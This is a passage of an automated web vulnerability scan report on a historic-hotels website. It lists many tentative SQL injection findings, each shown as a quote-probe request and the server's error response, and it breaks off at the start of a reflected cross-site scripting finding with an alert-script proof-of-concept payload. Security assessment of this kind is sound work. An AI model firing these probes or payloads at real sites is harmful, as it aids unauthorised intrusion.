User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)
Host: www.historichotels.org
Proxy-Connection: Keep-Alive
Cookie: __utmc=15851695; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; __utmb=15851695; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Wed, 20 Oct 2010 23:41:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Content-type: text/html


<script language="javascript">
   function GetHotels() {
       //alert(xmlhttp.responseText);
       //divDsp('hotel_list_a', 'none');
       var x = new getObj('hotel_list_div');
       x.innerHTML = xmlhttp.respo
...[SNIP]...
<p style="font-family: Verdana, Geneva, Arial">Sorry, but you have encountered and error. <br />
...[SNIP]...

Request 2

GET /inc_hotel_list.php?hotel_state_code=CA''& HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://www.historichotels.org/
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)
Host: www.historichotels.org
Proxy-Connection: Keep-Alive
Cookie: __utmc=15851695; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; __utmb=15851695; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Wed, 20 Oct 2010 23:41:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Content-type: text/html


<script language="javascript">
   function GetHotels() {
       //alert(xmlhttp.responseText);
       //divDsp('hotel_list_a', 'none');
       var x = new getObj('hotel_list_div');
       x.innerHTML = xmlhttp.respo
...[SNIP]...

1.9. http://www.historichotels.org/index.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.historichotels.org
Path:   /index.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /index.php' HTTP/1.1
Host: www.historichotels.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmc=15851695; __utmb=15851695;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Oct 2010 00:01:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Content-type: text/html

<p style="font-family: Verdana, Geneva, Arial">Sorry, but you have encountered and error. <br /> <br />Please contact <b><i><a href="mailto:hha@preferredhotelgroup.com?subject=Historic Hotels of Ameri
...[SNIP]...

Request 2

GET /index.php'' HTTP/1.1
Host: www.historichotels.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmc=15851695; __utmb=15851695;

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Thu, 21 Oct 2010 00:01:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Thu, 21 Oct 2010 00:01:40 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>Historic Hotels of America</title>
<META http-equiv=Content-Type
...[SNIP]...

1.10. http://www.historichotels.org/shop [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.historichotels.org
Path:   /shop

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /shop' HTTP/1.1
Host: www.historichotels.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmc=15851695; __utmb=15851695;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Oct 2010 00:01:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Content-type: text/html

<p style="font-family: Verdana, Geneva, Arial">Sorry, but you have encountered and error. <br /> <br />Please contact <b><i><a href="mailto:hha@preferredhotelgroup.com?subject=Historic Hotels of Ameri
...[SNIP]...

Request 2

GET /shop'' HTTP/1.1
Host: www.historichotels.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmc=15851695; __utmb=15851695;

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Thu, 21 Oct 2010 00:01:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Thu, 21 Oct 2010 00:01:14 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>Historic Hotels of America</title>
<META http-equiv=Content-Type
...[SNIP]...

1.11. http://www.historichotels.org/spas_retreats [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.historichotels.org
Path:   /spas_retreats

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /spas_retreats' HTTP/1.1
Host: www.historichotels.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmc=15851695; __utmb=15851695;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Oct 2010 00:04:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Content-type: text/html

<p style="font-family: Verdana, Geneva, Arial">Sorry, but you have encountered and error. <br /> <br />Please contact <b><i><a href="mailto:hha@preferredhotelgroup.com?subject=Historic Hotels of Ameri
...[SNIP]...

Request 2

GET /spas_retreats'' HTTP/1.1
Host: www.historichotels.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmc=15851695; __utmb=15851695;

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Thu, 21 Oct 2010 00:04:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Thu, 21 Oct 2010 00:04:12 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>Historic Hotels of America</title>
<META http-equiv=Content-Type
...[SNIP]...

1.12. http://www.historichotels.org/step_back_in_time [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.historichotels.org
Path:   /step_back_in_time

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /step_back_in_time' HTTP/1.1
Host: www.historichotels.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmc=15851695; __utmb=15851695;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Oct 2010 00:01:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Content-type: text/html

<p style="font-family: Verdana, Geneva, Arial">Sorry, but you have encountered and error. <br /> <br />Please contact <b><i><a href="mailto:hha@preferredhotelgroup.com?subject=Historic Hotels of Ameri
...[SNIP]...

Request 2

GET /step_back_in_time'' HTTP/1.1
Host: www.historichotels.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmc=15851695; __utmb=15851695;

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Thu, 21 Oct 2010 00:01:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Thu, 21 Oct 2010 00:01:38 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>Historic Hotels of America</title>
<META http-equiv=Content-Type
...[SNIP]...

1.13. http://www.historichotels.org/taste_of_napa [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.historichotels.org
Path:   /taste_of_napa

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /taste_of_napa' HTTP/1.1
Host: www.historichotels.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmc=15851695; __utmb=15851695;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Oct 2010 00:01:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Content-type: text/html

<p style="font-family: Verdana, Geneva, Arial">Sorry, but you have encountered and error. <br /> <br />Please contact <b><i><a href="mailto:hha@preferredhotelgroup.com?subject=Historic Hotels of Ameri
...[SNIP]...

Request 2

GET /taste_of_napa'' HTTP/1.1
Host: www.historichotels.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmc=15851695; __utmb=15851695;

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Thu, 21 Oct 2010 00:01:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Thu, 21 Oct 2010 00:01:24 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>Historic Hotels of America</title>
<META http-equiv=Content-Type
...[SNIP]...

1.14. http://www.historichotels.org/the_heathman_hotel_offer [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.historichotels.org
Path:   /the_heathman_hotel_offer

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /the_heathman_hotel_offer' HTTP/1.1
Host: www.historichotels.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmc=15851695; __utmb=15851695;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Oct 2010 00:01:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Content-type: text/html

<p style="font-family: Verdana, Geneva, Arial">Sorry, but you have encountered and error. <br /> <br />Please contact <b><i><a href="mailto:hha@preferredhotelgroup.com?subject=Historic Hotels of Ameri
...[SNIP]...

Request 2

GET /the_heathman_hotel_offer'' HTTP/1.1
Host: www.historichotels.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmc=15851695; __utmb=15851695;

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Thu, 21 Oct 2010 00:02:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Thu, 21 Oct 2010 00:02:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>Historic Hotels of America</title>
<META http-equiv=Content-Type
...[SNIP]...

1.15. http://www.historichotels.org/the_lenox_special_offer [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.historichotels.org
Path:   /the_lenox_special_offer

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /the_lenox_special_offer' HTTP/1.1
Host: www.historichotels.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmc=15851695; __utmb=15851695;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Oct 2010 00:01:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Content-type: text/html

<p style="font-family: Verdana, Geneva, Arial">Sorry, but you have encountered and error. <br /> <br />Please contact <b><i><a href="mailto:hha@preferredhotelgroup.com?subject=Historic Hotels of Ameri
...[SNIP]...

Request 2

GET /the_lenox_special_offer'' HTTP/1.1
Host: www.historichotels.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmc=15851695; __utmb=15851695;

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Thu, 21 Oct 2010 00:01:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Thu, 21 Oct 2010 00:01:53 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>Historic Hotels of America</title>
<META http-equiv=Content-Type
...[SNIP]...

1.16. http://www.historichotels.org/vacations_leisure [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.historichotels.org
Path:   /vacations_leisure

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /vacations_leisure' HTTP/1.1
Host: www.historichotels.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmc=15851695; __utmb=15851695;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Oct 2010 00:03:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Content-type: text/html

<p style="font-family: Verdana, Geneva, Arial">Sorry, but you have encountered and error. <br /> <br />Please contact <b><i><a href="mailto:hha@preferredhotelgroup.com?subject=Historic Hotels of Ameri
...[SNIP]...

Request 2

GET /vacations_leisure'' HTTP/1.1
Host: www.historichotels.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmc=15851695; __utmb=15851695;

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Thu, 21 Oct 2010 00:03:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Thu, 21 Oct 2010 00:03:57 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>Historic Hotels of America</title>
<META http-equiv=Content-Type
...[SNIP]...

1.17. http://www.historichotels.org/woodlands_inn_1906 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.historichotels.org
Path:   /woodlands_inn_1906

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /woodlands_inn_1906' HTTP/1.1
Host: www.historichotels.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmc=15851695; __utmb=15851695;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Oct 2010 00:01:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Content-type: text/html

<p style="font-family: Verdana, Geneva, Arial">Sorry, but you have encountered and error. <br /> <br />Please contact <b><i><a href="mailto:hha@preferredhotelgroup.com?subject=Historic Hotels of Ameri
...[SNIP]...

Request 2

GET /woodlands_inn_1906'' HTTP/1.1
Host: www.historichotels.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmc=15851695; __utmb=15851695;

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Thu, 21 Oct 2010 00:02:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Thu, 21 Oct 2010 00:02:02 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>Historic Hotels of America</title>
<META http-equiv=Content-Type
...[SNIP]...

1.18. http://www.historichotels.org/wort_hospitality [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.historichotels.org
Path:   /wort_hospitality

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /wort_hospitality' HTTP/1.1
Host: www.historichotels.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmc=15851695; __utmb=15851695;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Oct 2010 00:01:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Content-type: text/html

<p style="font-family: Verdana, Geneva, Arial">Sorry, but you have encountered and error. <br /> <br />Please contact <b><i><a href="mailto:hha@preferredhotelgroup.com?subject=Historic Hotels of Ameri
...[SNIP]...

Request 2

GET /wort_hospitality'' HTTP/1.1
Host: www.historichotels.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmc=15851695; __utmb=15851695;

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Thu, 21 Oct 2010 00:02:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Thu, 21 Oct 2010 00:02:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>Historic Hotels of America</title>
<META http-equiv=Content-Type
...[SNIP]...

2. Cross-site scripting (reflected)  previous  next
There are 15 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://www.historichotels.org/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.historichotels.org
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7ed0"><script>alert(1)</script>0e15bcac0c7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?e7ed0"><script>alert(1)</script>0e15bcac0c7=1 HTTP/1.1
